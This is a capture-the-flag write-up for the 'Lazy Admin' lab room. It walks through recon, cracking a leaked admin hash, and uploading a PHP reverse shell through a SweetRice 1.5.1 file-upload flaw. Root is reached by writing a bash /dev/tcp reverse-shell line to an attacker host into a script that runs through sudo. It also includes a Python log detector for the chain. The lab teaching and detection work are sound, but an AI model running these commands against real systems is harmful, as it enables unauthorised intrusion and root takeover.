Lazy Admin

Room Covers:

  • Service Discovery

  • Finding Vulnerabilities

  • Exploitation

  • Privilege Escalation

Target Details

  • IP: 10.10.209.190

Service Discovery

  • Using nmap

    nmap -sV -sC -Pn -oN nmap.txt 10.10.209.190
  • Services Discovered

    Service   Port   Version
    SSH       22     OpenSSH 7.2p2
    HTTP      80     Apache httpd 2.4.18

  • Finding Directories on HTTP server using GoBuster

    gobuster dir -u http://10.10.209.190/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -t 40 --no-error -o web-dirs.txt

    Directories Discovered: /content

  • On visiting the /content page, we see the server is running Basic CMS with Sweet Rice installed

Finding Vulnerabilities

  • From the first vulnerability, visiting the /content/inc/mysql_backup/ link gives us an SQL database backup file, from which we get a username and password hash; the hash can easily be cracked online with a tool such as CrackStation

    Username   Password hash                       Password
    manager    42f749ade7f9e195bf475f37a44cafcb    Passwordxxx

    We don't know the login page yet!

  • Moving to the parent directory /content/inc/, we get access to all the files, including /content/inc/lastest.txt, which gives the Sweet Rice version: 1.5.1

  • Searching for Sweet Rice 1.5.1 vulnerabilities on a search engine leads to a file upload vulnerability

  • Reading the exploit, the admin page is given as /as, but on this target it is located at /content/as

  • Visit /content/as with the admin credentials above

  • We can add custom PHP code from the ADS tab

  • TL;DR;

    Service      Vulnerability
    Sweet Rice   Sweet Rice 1.5.1 file upload

Exploitation

  • Create a malicious reverse shell advertisement

  • Using the PentestMonkey PHP reverse shell template, we can get shell access by changing the ip variable to our attacker VPN IP and then uploading it

  • Start listener using netcat

    nc -nlvp 1234
  • From /content/inc/ads/ we can execute the uploaded reverse shell

  • We have access to the shell

    listening on [any] 1234 ...
    connect to [10.x.x.x] from (UNKNOWN) [10.10.209.190] 40312
    Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
     11:43:09 up  1:26,  0 users,  load average: 0.83, 0.30, 0.10
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    
    $ sudo -l
    Matching Defaults entries for www-data on THM-Chal:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
    
    User www-data may run the following commands on THM-Chal:
        (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

    We can run /usr/bin/perl /home/itguy/backup.pl as root without a password
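
As an added example (not part of the original writeup), the following Python detector runs the attack chain described in the Finding Vulnerabilities and Exploitation sections over Apache access-log lines and flags its three stages: requests into the /content/inc/mysql_backup/ directory, POSTs to the /content/as admin panel, and a .php file being served from /content/inc/ads/. The log lines, client IPs, timestamps and file names are constructed; only the paths come from the writeup.

```python
import re

# Constructed Apache combined-log lines (not from the original room): the
# client IPs, timestamps and file names are made up, the paths are the
# SweetRice locations used in the writeup.
SAMPLE_LOG = """\
10.8.0.5 - - [12/Nov/2019:11:40:01 +0000] "GET /content/inc/mysql_backup/ HTTP/1.1" 200 1243 "-" "Mozilla/5.0"
10.8.0.5 - - [12/Nov/2019:11:40:03 +0000] "GET /content/inc/mysql_backup/backup.sql HTTP/1.1" 200 9112 "-" "Mozilla/5.0"
10.8.0.5 - - [12/Nov/2019:11:41:10 +0000] "POST /content/as/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.8.0.5 - - [12/Nov/2019:11:42:02 +0000] "GET /content/inc/ads/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.8.0.9 - - [12/Nov/2019:11:45:00 +0000] "GET /content/ HTTP/1.1" 200 3310 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# (label, method, required status or None, predicate on the request path)
RULES = [
    ("backup-dir-disclosure", "GET", "200",
     lambda p: p.startswith("/content/inc/mysql_backup/")),
    ("admin-panel-post", "POST", None,
     lambda p: p.split("?")[0].rstrip("/") == "/content/as"),
    ("php-in-ads-dir", "GET", "200",
     lambda p: p.startswith("/content/inc/ads/") and p.split("?")[0].endswith(".php")),
]

def parse_line(line):
    """Split one combined-log line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def detect(log_text):
    """Return {client_ip: [rule labels in the order they were hit]}."""
    findings = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for label, method, status, pred in RULES:
            if rec["method"] == method and status in (None, rec["status"]) and pred(rec["path"]):
                findings.setdefault(rec["ip"], []).append(label)
    return findings

def full_chain(findings):
    """Clients that hit every stage: disclosure, admin POST, PHP served from ads/."""
    needed = {label for label, *_ in RULES}
    return sorted(ip for ip, labels in findings.items() if needed <= set(labels))
```

A single stage alone (for example a 200 on the backup directory) is already worth alerting on, since that directory should never be reachable; full_chain narrows the result to clients that completed the whole sequence.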

Privilege Escalation

  • Finding Escalation Vectors

    The sudo -l output above shows that www-data may run /usr/bin/perl /home/itguy/backup.pl as root without a password, so whatever that script executes also runs as root

  • Victim's shell

    # overwrite /etc/copy.sh with a reverse shell that connects back to the attacker on port 4444
    echo "/bin/bash -c 'exec bash -i &>/dev/tcp/[ATTACKER_VPN_IP]/4444 <&1'" > /etc/copy.sh
    
    # on the attacker's machine, start a netcat listener on port 4444
    # nc -nlvp 4444
    
    # run backup.pl with sudo, which executes the modified /etc/copy.sh as root
    sudo /usr/bin/perl /home/itguy/backup.pl
  • Root Shell on Attacker's machine

    nc -nlvp 4444
    listening on [any] 4444 ...
    connect to [10.x.x.x] from (UNKNOWN) [10.10.209.190] 52812
    bash: cannot set terminal process group (1058): Inappropriate ioctl for device
    bash: no job control in this shell
    root@THM-Chal:/#

Get Flags

  • User Flag

    cat /home/itguy/user.txt
    # THM{63e5bce9271952xxxxxxxxxxxxxxxxxx}
  • Root Flag

    cat /root/root.txt
    # THM{6637f41d0177bxxxxxxxxxxxxxxxxxxx}
